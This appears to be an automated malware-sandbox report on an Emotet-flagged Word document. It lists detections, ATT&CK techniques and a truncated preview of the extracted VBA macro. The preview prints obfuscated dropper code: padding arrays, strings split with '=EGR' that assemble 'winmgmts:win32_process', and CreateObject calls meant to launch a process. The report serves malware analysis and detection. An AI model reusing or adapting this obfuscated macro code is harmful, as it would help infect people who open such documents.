MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The macro uses CreateObject to instantiate a COM object, likely to download and execute a second-stage payload. The ClamAV detection explicitly identifies the file as Emotet.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-9778091-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-9778091-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas35ba581a7d07c242723817cd679240b29046cc2a7f4485862374591738596dda |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9454 bytes |
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "O3qkgeo3axj"
Function Fyzdoclgiitpv(Yz_oszab8r4yqbk)
On Error Resume Next
Dim mpwuI()
ReDim mpwuI(1)
mpwuI(0) = 3445 + 6732
Dim JFRbg()
ReDim JFRbg(3)
JFRbg(0) = 99 + 8871
JFRbg(1) = 1 + 5891
JFRbg(2) = 279 + 4
Dim BldwC()
ReDim BldwC(1)
BldwC(0) = 93 + 146
Fyzdoclgiitpv = Join(Yz_oszab8r4yqbk, Q_2rf4brbqy_)
Dim ntjwcEAJd()
ReDim ntjwcEAJd(2)
ntjwcEAJd(0) = 6 + 14241
ntjwcEAJd(1) = 5491 + 39
Dim aWxSqEh()
ReDim aWxSqEh(1)
aWxSqEh(0) = 9 + 7
Dim vfBzJ()
ReDim vfBzJ(3)
vfBzJ(0) = 6033 + 81491
vfBzJ(1) = 1 + 51
vfBzJ(2) = 322 + 6
End Function
Function Dhelx0f9ndh(E0c5gl6od5d55)
On Error Resume Next
Dim YJLjmBJ()
ReDim YJLjmBJ(1)
YJLjmBJ(0) = 6 + 233
Dim EltfI()
ReDim EltfI(3)
EltfI(0) = 2 + 6721
EltfI(1) = 5 + 851
EltfI(2) = 1 + 788
Dim AOlTn()
ReDim AOlTn(2)
AOlTn(0) = 5 + 9861
AOlTn(1) = 318 + 63
Set Dhelx0f9ndh = CreateObject(E0c5gl6od5d55)
Dim MsfZJYiB()
ReDim MsfZJYiB(1)
MsfZJYiB(0) = 5 + 7274
Dim rbIIE()
ReDim rbIIE(3)
rbIIE(0) = 5616 + 97961
rbIIE(1) = 7 + 51
rbIIE(2) = 101 + 8
Dim PEbqDED()
ReDim PEbqDED(2)
PEbqDED(0) = 639 + 301
PEbqDED(1) = 704 + 5
End Function
Function V7pw_9kod2g(N3l4_2mdbgzj2)
On Error Resume Next
Dim zqpety()
ReDim zqpety(1)
zqpety(0) = 100 + 2
Dim DtGqEJHRF()
ReDim DtGqEJHRF(2)
DtGqEJHRF(0) = 59 + 41
DtGqEJHRF(1) = 7 + 4
Dim IescrC()
ReDim IescrC(2)
IescrC(0) = 72 + 11
IescrC(1) = 24 + 8
V7pw_9kod2g = Split(N3l4_2mdbgzj2, "=EGR")
Dim hasmw()
ReDim hasmw(1)
hasmw(0) = 2 + 86
Dim ZyPIEFJV()
ReDim ZyPIEFJV(3)
ZyPIEFJV(0) = 4 + 31
ZyPIEFJV(1) = 68 + 31
ZyPIEFJV(2) = 1 + 371
Dim xyoKZqCC()
ReDim xyoKZqCC(1)
xyoKZqCC(0) = 962 + 9121
End Function
Attribute VB_Name = "Sahhp8qg6vx"
Attribute VB_Base = "0{066E2C3A-7DB1-4A15-8C09-FCC32355ED11}{630D8C15-F56F-4457-BE93-C863FF930789}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Q4xosdyaga102a4y()
On Error Resume Next
Dim szmOASXOm()
ReDim szmOASXOm(3)
szmOASXOm(0) = 6 + 71
szmOASXOm(1) = 5688 + 6951
szmOASXOm(2) = 3 + 3
Dim QgTZV()
ReDim QgTZV(2)
QgTZV(0) = 8 + 11
QgTZV(1) = 2933 + 9
Dim RMvKHkaGF()
ReDim RMvKHkaGF(1)
RMvKHkaGF(0) = 493 + 82
Ne43lo8oou5a = F1k8d87mk3_a96wl + "=EGRro=EGR=EGRce=EGRs=EGRs=EGR" + Zhzw8qz34i5xai7c
Dim iEOEB()
ReDim iEOEB(2)
iEOEB(0) = 87 + 661
iEOEB(1) = 8 + 8
Dim gvnlAE()
ReDim gvnlAE(3)
gvnlAE(0) = 41 + 4311
gvnlAE(1) = 8159 + 29261
gvnlAE(2) = 14 + 8117
Dim HADPBGH()
ReDim HADPBGH(2)
HADPBGH(0) = 9 + 51
HADPBGH(1) = 69 + 26
Fa8ipl2k6tptb4yt = Wrvyced5hln6 + "=EGR=EGR:=EGRw=EGRin=EGR=EGR3=EGR2=EGR_=EGR" + S6_r5d8bljwf
Dim MIpOFBA()
ReDim MIpOFBA(3)
MIpOFBA(0) = 3 + 61
MIpOFBA(1) = 4385 + 81
MIpOFBA(2) = 5 + 1
Dim HvAGVEHHC()
ReDim HvAGVEHHC(3)
HvAGVEHHC(0) = 7 + 91
HvAGVEHHC(1) = 3 + 201
HvAGVEHHC(2) = 141 + 513
Dim ecNAlEII()
ReDim ecNAlEII(1)
ecNAlEII(0) = 7 + 790
N3l4_2mdbgzj2 = Rb1ktd93_f2_8 + "=EGR=EGRw=EGRi=EGRnm=EGR=EGRgm=EGRt=EGR=EGR" + P3zfl9vu0xu
Dim vVnZH()
ReDim vVnZH(3)
vVnZH(0) = 11 + 591
vVnZH(1) = 1692 + 88531
vVnZH(2) = 7 + 9
Dim WmzZkjHCT()
ReDim WmzZkjHCT(2)
WmzZkjHCT(0) = 25 + 11
WmzZkjHCT(1) = 1 + 2466
Dim zRrBDZ()
ReDim zRrBDZ(2)
zRrBDZ(0) = 98 + 51
zRrBDZ(1) = 373 + 860
Dtpls80_al4 = Sahhp8qg6vx.D4ksgrggkdrf7zmyk.Pages(1).Caption
Dim LthRXwJ()
ReDim LthRXwJ(1)
LthRXwJ(0) = 9 + 3305
Dim NOvwHGDB()
ReDim NOvwHGDB(3)
NOvwHGDB(0) = 1 + 7761
NOvwHGDB(1) = 8 + 81
NOvwHGDB(2) = 418 + 9
Dim Zuurp()
ReDim Zuurp(3)
Zuurp(0) = 9 + 38171
Zuurp(1) = 3170 + 21
Zuurp(2) = 3404 + 3735
S5oie8s498u1hh = N3l4_2mdbgzj2 + Dtpls80_al4 + Fa8ipl2k6tptb4yt + Sahhp8qg6vx.K7ya3mkemcee + Ne43lo8oou5a
Dim RBsCGDzFP()
ReDim RBsCGDzFP(3)
RBsCGDzFP(0) = 8 + 21
RBsCGDzFP(1) = 76 + 5981
RBsCGDzFP(2) = 4 + 9536
Dim rsSKdH()
ReDim rsSKdH(3)
rsSKdH(0) = 56 + 961
rsSKdH(1) = 8521 + 41
rsSKdH(2) = 922 + 4300
Dim nUtqJGH()
ReDim nUtqJGH(3)
nUtqJGH(0) =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.